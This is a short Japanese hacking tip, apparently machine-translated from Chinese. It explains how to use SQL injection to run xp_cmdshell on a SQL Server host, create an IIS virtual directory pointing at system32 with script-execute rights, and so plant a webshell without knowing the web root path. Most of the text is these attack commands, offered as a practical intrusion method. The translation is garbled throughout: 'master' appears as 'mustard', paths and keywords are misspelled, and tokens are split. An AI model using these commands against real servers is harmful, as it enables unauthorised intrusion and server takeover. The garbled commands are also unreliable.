SQL注入で仮想ディレクトリを作成し、Web絶対パスを探してください。

私たちはSQL注入でディレクトリと実行コマンドを作成することができますが、ウェブサイトのディレクトリを見つけにくいです。webshellを入手するのは難しいです。 
exec マスタード.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScript s\mkwebdir.vbs -c local host -w "l「l」 -v "win"，"c:\wint\system 32"' 
仮想ディレクトリwinを作成して、c:\wint\system 32を指します。 
exec マスタード.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScript s\adsutil.vbs w 3 svc/1/root/win/Access execute Ture 
win文に解析aspスクリプトの権限を持たせます。 
exec マスタード.dbo.xp_cmdshell "cscript C:\Interpub\AdminScript s\adsutil.vbs delete w 3 svc/1/root/h 4 x 0 r/" 
仮想ディレクトリを削除します。 
ウェブの絶対パスが見つからない解決策の一つです。 
http://21o.net/h4x0r 
403エラー、仮想ディレクトリが作成されました。